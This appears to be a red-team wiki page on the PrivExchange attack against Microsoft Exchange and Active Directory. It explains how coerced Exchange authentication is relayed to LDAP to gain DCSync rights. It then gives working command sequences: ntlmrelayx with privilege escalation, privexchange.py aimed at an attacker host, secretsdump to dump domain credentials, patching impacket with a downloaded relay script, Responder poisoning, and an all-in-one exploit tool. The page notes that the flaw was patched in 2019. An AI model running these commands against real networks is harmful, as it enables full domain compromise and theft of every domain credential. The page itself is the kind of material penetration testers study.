# PrivExchange
## Theory
PrivExchange relay on the [PushSubscription coerced authentication](https://red.infiltr8.io/ad/movement/mitm-and-coerced-authentications/pushsubscription-abuse), PushSubscription is an API on Exchange Web Services that allows to subscribe to push notifications. Attackers abuse it to make Exchange servers authenticate to a target of their choosing. **The coerced authentication is made over HTTP**, which is particularly powerful when doing [NTLM relay](https://red.infiltr8.io/ad/movement/exchange-services/broken-reference) ([because of the Session Signing and MIC mitigations](https://red.infiltr8.io/ad/movement/exchange-services/broken-reference)).
As Exchange servers usually have high privileges in a domain (i.e. `WriteDacl`, see [Abusing ACLs](https://red.infiltr8.io/ad/movement/exchange-services/broken-reference)), the forced authentication can then be relayed and abused to obtain domain admin privileges (see [NTLM Relay](https://red.infiltr8.io/ad/movement/exchange-services/broken-reference) and [Kerberos Unconstrained Delegations](https://red.infiltr8.io/ad/kerberos/delegations#unconstrained-delegations-kud)).
## Practice
{% hint style="warning" %}
On February 12th 2019, Microsoft released updates for Exchange which resolved
* the coerced authentication issue
* the fact that Exchange servers had overkill permissions leading attacker to a full domain compromission.
{% endhint %}
{% tabs %}
{% tab title="Exploit - with creds" %}
First, start the NTLM relay that will escalate privileges
```bash
# NTLM relaying is used to relay connexion and give DCSync privileges
ntlmrelayx.py -t ldap://$DC --escalate-user $USER_TO_ESCALATE
```
Using [PrivExchange](https://github.com/dirkjanm/privexchange/), we can log in on Exchange Web Services and call the API. The user must have a mailbox to make the coerced authentication.
```bash
privexchange.py -d $DOMAIN -u '$DOMAIN_USER' -p '$PASSWORD' -ah $ATTACKER_IP $EXCHANGE_SERVER_TARGET
```
We can now dump domain credentials throught DCSync
```bash
secretsdump.py $DOMAIN/$USER_TO_ESCALATE@$DC -just-dc
```
{% endtab %}
{% tab title="Exploit - without creds" %}
If you don't have any credentials, it is still possible to [relay the authentication](https://red.infiltr8.io/ad/movement/exchange-services/broken-reference) to make the API call. The [httpattack.py](https://github.com/dirkjanm/PrivExchange/blob/master/httpattack.py) script can be used with ntlmrelayx.py to perform this attack. It uses NTLM Relaying with LLMNR / NBT-NS to relay captured credentials over the network.
Using the modified httpattack.py, we can use ntlmrelayx to perform this attack.
```bash
#Backup the old httpattack.py
cd /PATH/TO/impacket/impacket/examples/ntlmrelayx/attacks/
mv httpattack.py httpattack.py.old
#Replace it
wget https://raw.githubusercontent.com/dirkjanm/PrivExchange/master/httpattack.py
#Edit the attacker_url parameter (the host to which Exchange will authenticate)
sed -i 's/attacker_url = .*$/attacker_url = "$ATTACKER_URL"/' httpattack.py
#Build the env
cd /PATH/TO/impacket
virtualenv venv && source venv/bin/activate
pip install .
#Start relay
ntlmrelayx.py -t https://exchange.server.EWS/Exchange.asmx
```
We can now use LLMNR/NBT-NS/mDNS poisoning with responder, to capture credentials and relay them:
```bash
responder -i eth0
```
{% endtab %}
{% tab title="Exploit - Auto" %}
[Exchange2domain](https://github.com/Ridter/Exchange2domain) is a all in One tools of Privexchange exploit. You only need to open the web server port, so no high privileges are required.
```bash
python2.7 Exchange2domain.py -ah attackterip -ap listenport -u user -p password -d domain.com -th DCip MailServerip
```
{% endtab %}
{% endtabs %}
## References
{% embed url="" %}
